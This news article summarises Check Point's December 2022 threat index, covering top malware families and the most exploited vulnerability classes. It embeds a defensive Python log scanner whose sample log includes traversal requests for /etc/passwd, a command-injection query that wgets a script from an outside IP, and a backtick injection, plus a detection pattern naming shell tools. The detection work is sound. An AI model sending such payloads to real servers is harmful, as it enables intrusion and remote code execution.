Saturday, 19 April 2025, 9:11 pm

    Cybersecurity firm bares most prevalent Internet threats

    Leading cybersecurity vendor Check Point Software Technologies has published its latest Global Threat Index for December 2022 in which the Glupteba malware, an ambitious blockchain-enabled Trojan botnet, returned to the top ten list for the first time since July last year. 

    Qbot, a sophisticated Trojan that steals banking credentials and keystrokes, overtook Emotet as the most prevalent malware after its December 2022 return, impacting 7 percent of organizations worldwide.

    Android malware Hiddad also made a comeback, with education continuing as the most impacted industry worldwide.

    Maya Horowitz, vice president for research at Check Point Software said: “The overwhelming theme from our latest research is how malware often masquerades as legitimate software to give hackers backdoor access to devices without raising suspicion. That is why it is important to do your due diligence when downloading any software and applications or clicking on links, regardless of how genuine they look.” 

    Although Google disrupted Glupteba operations in December 2021, the malware has sprung back into action. 

    As a modular malware variant, Glupteba can achieve various objectives on an infected computer and is often used as a downloader and dropper for other malware. This means that a Glupteba infection could lead to a ransomware infection, data breach, or other security incident.

    Glupteba is also designed to steal user credentials and session cookies from infected machines. This authentication data can be used to gain access to a user’s online accounts or other systems, enabling the attacker to steal sensitive data or take other action using the compromised accounts. 

    Finally, the malware is commonly used to deploy cryptomining functions on its target, draining a computer’s resources by using them to mine cryptocurrency.

    In December, the cybersecurity company also saw Hiddad make the top three mobile malware list for the first time in 2022. 

    Hiddad is an ad-distributing malware targeting Android devices. It repackages legitimate apps and then releases them to a third-party store. Its main function is to display ads, but it can also gain access to key security details built into the OS.

    The overwhelming theme from the company’s latest research is how malware often masquerades as legitimate software to give hackers backdoor access to devices without raising suspicion.

    That is why it is important to do due diligence when downloading any software and applications or clicking on links, regardless of how genuine they look.

    Its research also revealed that “Web Server Exposed Git Repository Information Disclosure” was the most commonly exploited vulnerability, impacting 46 percent of organizations globally, followed by “Web Servers Malicious URL Directory Traversal” with 44 percent of organizations impacted worldwide. 

    “Command Injection Over HTTP” was the third most exploited vulnerability, with a global impact of 43 percent.  
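    The three vulnerability classes above all show up in ordinary web-server access logs, so a defender can check whether they are being probed without waiting for a vendor feed. The following is an added example written for this article, not code from Check Point or from the report: it parses combined-format log lines (the sample lines are constructed, with documentation-range IP addresses), percent-decodes each request up to three times so that double-encoded traversal such as `%252e%252e` is caught, and flags requests that touch a `.git` directory, contain a `..` path segment after decoding, or carry a shell metacharacter followed by a common command name. The class names, thresholds and the list of command words are the example’s own choices, not the index’s.

```python
"""Flag access-log requests that match the three exploit classes named in the
Check Point index: exposed .git repository, directory traversal, and command
injection over HTTP.  Added example; all sample data below is constructed."""
import re
from urllib.parse import unquote, unquote_plus

# Constructed sample lines in Apache/nginx combined log format.
SAMPLE_LOG = """\
198.51.100.7 - - [11/Dec/2022:10:01:02 +0000] "GET /.git/HEAD HTTP/1.1" 200 23 "-" "curl/7.85.0"
198.51.100.7 - - [11/Dec/2022:10:01:03 +0000] "GET /.git/config HTTP/1.1" 200 92 "-" "curl/7.85.0"
203.0.113.9 - - [11/Dec/2022:10:02:10 +0000] "GET /static/..%2f..%2f..%2fetc/passwd HTTP/1.1" 404 0 "-" "python-requests/2.28"
203.0.113.9 - - [11/Dec/2022:10:02:11 +0000] "GET /static/%252e%252e/%252e%252e/etc/passwd HTTP/1.1" 404 0 "-" "python-requests/2.28"
192.0.2.44 - - [11/Dec/2022:10:03:00 +0000] "GET /cgi-bin/ping.cgi?host=127.0.0.1;wget+http://192.0.2.1/x.sh HTTP/1.1" 200 51 "-" "Mozilla/5.0"
192.0.2.44 - - [11/Dec/2022:10:03:01 +0000] "POST /api/run?cmd=%60id%60 HTTP/1.1" 500 0 "-" "Mozilla/5.0"
10.0.0.5 - - [11/Dec/2022:10:04:00 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
10.0.0.5 - - [11/Dec/2022:10:04:01 +0000] "GET /docs/git-tutorial.html?q=a..b HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

# client, ident, user, [timestamp], "METHOD target protocol", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]*)" (?P<status>\d{3})'
)

# Shell metacharacter followed by a command name; the word list is this
# example's own heuristic and will need tuning for a real application.
CMD_INJECTION_RE = re.compile(
    r'(?:;|\||&&|`|\$\()\s*'
    r'(?:wget|curl|id|whoami|cat|sh|bash|nc|chmod|rm|echo|uname|python|perl)\b'
)


def fully_decode(s, decoder, rounds=3):
    """Percent-decode until the string stops changing (bounded), so that
    double-encoded payloads such as %252e%252e become '..'."""
    for _ in range(rounds):
        decoded = decoder(s)
        if decoded == s:
            break
        s = decoded
    return s


def classify_request(target):
    """Return the set of exploit classes a request target matches (may be empty)."""
    raw_path, _, raw_query = target.partition("?")
    # '+' is a literal in paths but a space in query strings, hence two decoders.
    path = fully_decode(raw_path, unquote).replace("\\", "/")
    query = fully_decode(raw_query, unquote_plus)
    hits = set()

    segments = [seg for seg in path.split("/") if seg]
    # Exposed repository: any path segment that is exactly ".git"
    # (HEAD and config are the files attackers usually request first).
    if ".git" in segments:
        hits.add("git-exposure")
    # Traversal: a literal ".." segment once all encoding layers are stripped.
    if ".." in segments:
        hits.add("directory-traversal")
    # Command injection: metacharacter + command word in query or path.
    if CMD_INJECTION_RE.search(query) or CMD_INJECTION_RE.search(path):
        hits.add("command-injection")
    return hits


def scan_log(text):
    """Parse each line and return (client ip, status, raw target, sorted classes)
    for every request that matched at least one class."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not combined-format; skip rather than guess
        classes = classify_request(m["target"])
        if classes:
            findings.append((m["ip"], int(m["status"]), m["target"], sorted(classes)))
    return findings


def confirmed_git_exposures(findings):
    """A .git probe answered with 200 means the repository really is readable;
    a 403/404 is only evidence of scanning."""
    return [(ip, target) for ip, status, target, classes in findings
            if "git-exposure" in classes and status == 200]


if __name__ == "__main__":
    results = scan_log(SAMPLE_LOG)
    for ip, status, target, classes in results:
        print(f"{ip:<14} {status} {','.join(classes):<20} {target}")
    print("confirmed exposed repositories:", confirmed_git_exposures(results))
```

    Two points worth noting from the sample run: the traversal attempts return 404, so they failed against this server but still mark the client as scanning, while the two `.git` requests returned 200, which is the condition that makes the information-disclosure finding real rather than attempted. The last two sample lines (a normal page and a query containing `a..b`) are there to show that `..` is only counted as a path segment, not anywhere in the URL.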

    The following were tracked as the most prevalent malware during the period. Arrows indicate rank change. 

    1. ↑ Qbot – Qbot aka Qakbot is a banking Trojan that first appeared in 2008. It was designed to steal a user’s banking credentials and keystrokes. Often distributed via spam email, Qbot employs several anti-VM, anti-debugging, and anti-sandbox techniques to hinder analysis and evade detection.
    2.  Emotet – Emotet is an advanced, self-propagating and modular Trojan. Emotet used to be employed as a banking Trojan, and more recently has been used as a distributor for other malware or malicious campaigns. It uses multiple methods for maintaining persistence and evasion techniques to avoid detection. In addition, it can be spread through phishing spam emails containing malicious attachments or links.
    3. ↑ XMRig – XMRig is open-source CPU mining software used to mine the Monero cryptocurrency. Threat actors often abuse this open-source software by integrating it into their malware to conduct illegal mining on victims’ devices.
    4. ↑ Formbook – Formbook is an Infostealer targeting the Windows OS and was first detected in 2016. It is marketed as Malware as a Service (MaaS) in underground hacking forums for its strong evasion techniques and relatively low price. FormBook harvests credentials from various web browsers, collects screenshots, monitors and logs keystrokes, and can download and execute files according to orders from its C&C.
    5. ↑ Nanocore – NanoCore is a Remote Access Trojan that targets Windows operating system users and was first observed in the wild in 2013. All versions of the RAT contain basic plugins and functionalities such as screen capture, cryptocurrency mining, remote control of the desktop and webcam session theft.
    6. ↑ Ramnit – Ramnit is a modular banking Trojan first discovered in 2010. Ramnit steals web session information, giving its operators the ability to steal account credentials for all services used by the victim, including bank accounts, and corporate and social networks accounts. The Trojan uses both hardcoded domains as well as domains generated by a DGA (Domain Generation Algorithm) to contact the C&C server and download additional modules.
    7. ↑ Remcos – Remcos is a RAT that first appeared in the wild in 2016. Remcos distributes itself through malicious Microsoft Office documents attached to spam emails, and is designed to bypass Microsoft Windows UAC security and execute malware with high-level privileges.
    8. ↑ Glupteba – Known since 2011, Glupteba is a backdoor that gradually matured into a botnet. By 2019 it included a C&C address update mechanism through data published on the public Bitcoin blockchain, an integral browser stealer capability and a router exploiter.
    9. ↓ AgentTesla – AgentTesla is an advanced RAT functioning as a keylogger and information stealer, which is capable of monitoring and collecting the victim’s keyboard input and system clipboard, taking screenshots, and exfiltrating credentials for a variety of software installed on a victim’s machine (including Google Chrome, Mozilla Firefox and the Microsoft Outlook email client).
    10. ↓ Phorpiex – Phorpiex is a botnet (aka Trik) that has been active since 2010 and at its peak controlled more than a million infected hosts. It is known for distributing other malware families via spam campaigns as well as fueling large-scale spam and sextortion campaigns.
